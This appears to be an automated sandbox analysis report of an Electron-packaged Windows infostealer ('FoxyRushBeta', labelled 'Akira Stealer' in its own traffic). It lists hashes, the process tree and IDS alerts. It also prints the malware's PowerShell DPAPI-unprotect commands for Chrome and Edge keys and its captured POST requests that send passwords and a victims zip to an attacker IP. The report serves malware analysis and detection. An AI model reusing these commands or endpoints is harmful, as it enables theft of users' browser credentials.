Windows Analysis Report
bkHLzNaNMS.exe

Overview

General Information

Sample name: bkHLzNaNMS.exe (renamed because the original name is a hash value)
Original sample name: f0b16538689c8c0e7ea186f4cfb2f1fbc555ecb9ab26c55511be13e730388570.exe
Analysis ID: 1631455
MD5: 408339f6e7f66e152371d41ad5f87f30
SHA1: e1fb82a61a19969899e5564f6e08e7fa9acc6bec
SHA256: f0b16538689c8c0e7ea186f4cfb2f1fbc555ecb9ab26c55511be13e730388570
Tags: exe, user-JAMESWT_MHT

Detection

Score: 60
Range: 0 - 100
Confidence: 100%

Signatures

Suricata IDS alerts for network traffic
Detected generic credential text file
Drops large PE files
Tries to harvest and steal browser information (history, passwords, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • bkHLzNaNMS.exe (PID: 6148 cmdline: "C:\Users\user\Desktop\bkHLzNaNMS.exe" MD5: 408339F6E7F66E152371D41AD5F87F30)
    • FoxyRushBeta.exe (PID: 3712 cmdline: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe MD5: FC4789C7070BC50237A11B100DBC7DB3)
      • cmd.exe (PID: 2940 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 5780 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • FoxyRushBeta.exe (PID: 3380 cmdline: "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1908,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1900 /prefetch:2 MD5: FC4789C7070BC50237A11B100DBC7DB3)
      • cmd.exe (PID: 1656 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 4320 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • FoxyRushBeta.exe (PID: 5336 cmdline: "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --field-trial-handle=2528,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2524 /prefetch:3 MD5: FC4789C7070BC50237A11B100DBC7DB3)
      • cmd.exe (PID: 5948 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6120 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • FoxyRushBeta.exe (PID: 3996 cmdline: "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --field-trial-handle=2524,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2520 /prefetch:3 MD5: FC4789C7070BC50237A11B100DBC7DB3)
      • cmd.exe (PID: 6984 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 5636 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • FoxyRushBeta.exe (PID: 5476 cmdline: "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=32902 --gpu-device-id=32069 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2644,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1296 /prefetch:8 MD5: FC4789C7070BC50237A11B100DBC7DB3)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser'), CommandLine: powershell.exe Add-Type -AssemblyName System.Security; 
[System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser'), CommandLine|base64offset|contains: ~O*^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,1
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T06:39:11.761382+0100 | 2029846 | 1 | A Network Trojan was detected | 192.168.2.5 | 49725 | 151.243.200.62 | 80 | TCP
2025-03-07T06:39:11.761382+0100 | 2035016 | 1 | A Network Trojan was detected | 192.168.2.5 | 49725 | 151.243.200.62 | 80 | TCP
2025-03-07T06:39:11.761382+0100 | 2035015 | 1 | A Network Trojan was detected | 192.168.2.5 | 49725 | 151.243.200.62 | 80 | TCP

Source: bkHLzNaNMS.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe | File created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\LICENSE.electron.txt
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe | File created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\LICENSE.electron.txt
Source: bkHLzNaNMS.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Dev\elevate\bin\x86\Release\Elevate.pdb | source: elevate.exe.0.dr
Source: Binary string: libGLESv2.dll.pdb | source: libGLESv2.dll.0.dr
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe | File opened: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\app.asar.unpacked\node_modules\@primno
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe | File opened: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\app.asar.unpacked\node_modules\@primno\dpapi
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe | File opened: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\app.asar.unpacked\node_modules
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe | File opened: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\app.asar.unpacked
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe | File opened: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe | File opened: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\locales

Networking

Source: Network traffic | Suricata IDS: 2029846 - Severity 1 - ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) : 192.168.2.5:49725 -> 151.243.200.62:80
Source: Network traffic | Suricata IDS: 2035015 - Severity 1 - ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2 : 192.168.2.5:49725 -> 151.243.200.62:80
Source: Network traffic | Suricata IDS: 2035016 - Severity 1 - ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2 : 192.168.2.5:49725 -> 151.243.200.62:80
Source: global traffic | HTTP traffic detected: POST /upload HTTP/1.1
  content-type: multipart/form-data; boundary=--------------------------512384708799784675160631
  Host: 151.243.200.62
  Content-Length: 1346
  Connection: keep-alive
  Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 35 31 32 33 38 34 37 30 38 37 39 39 37 38 34 36 37 35 31 36 30 36 33 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 35 37 39 35 36 39 76 69 63 74 69 6d 73 31 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a
  Data Ascii: ----------------------------512384708799784675160631 Content-Disposition: form-data; name="file"; filename="579569victims1.zip" Content-Type: application/zip
Source: Joe Sandbox View | IP Address: 104.26.13.205
Source: Joe Sandbox View | ASN Name: RASANAIR
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | TCP traffic detected without corresponding DNS query: 151.243.200.62
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /inject HTTP/1.1
  Accept: application/json, text/plain, */*
  User-Agent: axios/1.8.1
  Accept-Encoding: gzip, compress, deflate, br
  Host: 151.243.200.62
  Connection: keep-alive
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: unknown | HTTP traffic detected: POST /passwords HTTP/1.1
  Accept: application/json, text/plain, */*
  Content-Type: application/json
  User-Agent: axios/1.8.1
  Content-Length: 130
  Accept-Encoding: gzip, compress, deflate, br
  Host: 151.243.200.62
  Connection: keep-alive
  Data Raw: 7b 22 70 61 73 73 77 6f 72 64 73 22 3a 22 3c 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5b 41 6b 69 72 61 20 53 74 65 61 6c 65 72 5d 3e 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3e 5c 6e 5c 6e 4e 6f 20 70 61 73 73 77 6f 72 64 73 20 66 6f 75 6e 64 2e 22 2c 22 6b 65 79 22 3a 22 31 32 32 62 38 38 61 33 66 63 31 61 66 33 61 35 33 66 38 65 36 62 64 37 65 37 36 33 30 64 37 37 22 7d
  Data Ascii: {"passwords":"<================[Akira Stealer]>================>\n\nNo passwords found.","key":"122b88a3fc1af3a53f8e6bd7e7630d77"}
Source: libGLESv2.dll.0.dr | String found in binary or memory: http://anglebug.com/42267082
Source: libGLESv2.dll.0.dr | String found in binary or memory: http://anglebug.com/42267082ProgramGL::postLinkJobImpl
Source: elevate.exe.0.dr | String found in binary or memory: http://int3.de/
Source: bkHLzNaNMS.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr | String found in binary or memory: https://chrome.google.com/webstore/category/extensions
Source: fr.pak.0.dr | String found in binary or memory: https://chrome.google.com/webstore?hl=fr&category=theme81https://myactivity.google.com/myactivity/?u
Source: fr.pak.0.dr | String found in binary or memory: https://chrome.google.com/webstore?hl=frCtrl$1
Source: sw.pak.0.dr | String found in binary or memory: https://chrome.google.com/webstore?hl=sw&category=theme81https://myactivity.google.com/myactivity/?u
Source: sw.pak.0.dr | String found in binary or memory: https://chrome.google.com/webstore?hl=swCtrl$1
Source: zh-CN.pak.0.dr | String found in binary or memory: https://chrome.google.com/webstore?hl=zh-CN&category=theme81https://myactivity.google.com/myactivity
Source: zh-CN.pak.0.dr | String found in binary or memory: https://chrome.google.com/webstore?hl=zh-CNCtrl$1
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr | String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherEnabled
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr | String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr | String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr | String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylist
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr | String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlList
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr | String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelist
Source: zh-CN.pak.0.dr, fr.pak.0.dr | String found in binary or memory: https://chromestatus.com/features#browsers.chrome.status%3A%22Deprecated%22
Source: dpapi_win.cpp.0.dr | String found in binary or memory: https://github.com/bradhugh/node-dpapi
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr | String found in binary or memory: https://myactivity.google.com/
Source: sw.pak.0.dr | String found in binary or memory: https://passwords.google.comAkaunti
Source: fr.pak.0.dr | String found in binary or memory: https://passwords.google.comCompte
Source: zh-CN.pak.0.dr | String found in binary or memory: https://passwords.google.comGoogle
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr | String found in binary or memory: https://policies.google.com/
Source: libGLESv2.dll.0.dr | String found in binary or memory: https://shorturl.at/drFY7)
Source: zh-CN.pak.0.dr, fr.pak.0.dr | String found in binary or memory: https://support.google.com/chrome/a/?p=browser_profile_details
Source: zh-CN.pak.0.dr, fr.pak.0.dr | String found in binary or memory: https://support.google.com/chrome/a/answer/9122284
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr | String found in binary or memory: https://support.google.com/chrome/answer/6098869
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr | String found in binary or memory: https://support.google.com/chromebook?p=app_intent
Source: zh-CN.pak.0.dr | String found in binary or memory: https://www.google.com/chrome/privacy/eula_text.html
Source: fr.pak.0.dr | String found in binary or memory: https://www.google.com/chrome/privacy/eula_text.html&AideG
Source: sw.pak.0.dr | String found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlInasimamiwa
Source: libGLESv2.dll.0.dr | String found in binary or memory: https://www.khronos.org/spir/visualizer/
Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726

System Summary

Source: C:\Users\user\Desktop\bkHLzNaNMS.exe | File dump: FoxyRushBeta.exe.0.dr 190491136
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe | File dump: FoxyRushBeta.exe0.0.dr 190491136
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe | Process token adjusted: Security
Source: FoxyRushBeta.exe.0.dr | Static PE information: Number of sections : 15 > 10
Source: FoxyRushBeta.exe0.0.dr | Static PE information: Number of sections : 15 > 10
Source: bkHLzNaNMS.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine | Classification label: mal60.spyw.winEXE@31/128@1/2
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe | File created: C:\Users\user\AppData\Roaming\FoxyRushBeta
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5728:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6588:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe | Mutant created: \Sessions\1\BaseNamedObjects\mfx_d3d_mutex
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5968:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4616:120:WilError_03
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe | File created: C:\Users\user\AppData\Local\Temp\nsdDF37.tmp
Source: bkHLzNaNMS.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe | File read: C:\Users\user\Desktop\bkHLzNaNMS.exe
Source: unknown | Process created: C:\Users\user\Desktop\bkHLzNaNMS.exe "C:\Users\user\Desktop\bkHLzNaNMS.exe"
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe | Process created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1908,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1900 /prefetch:2
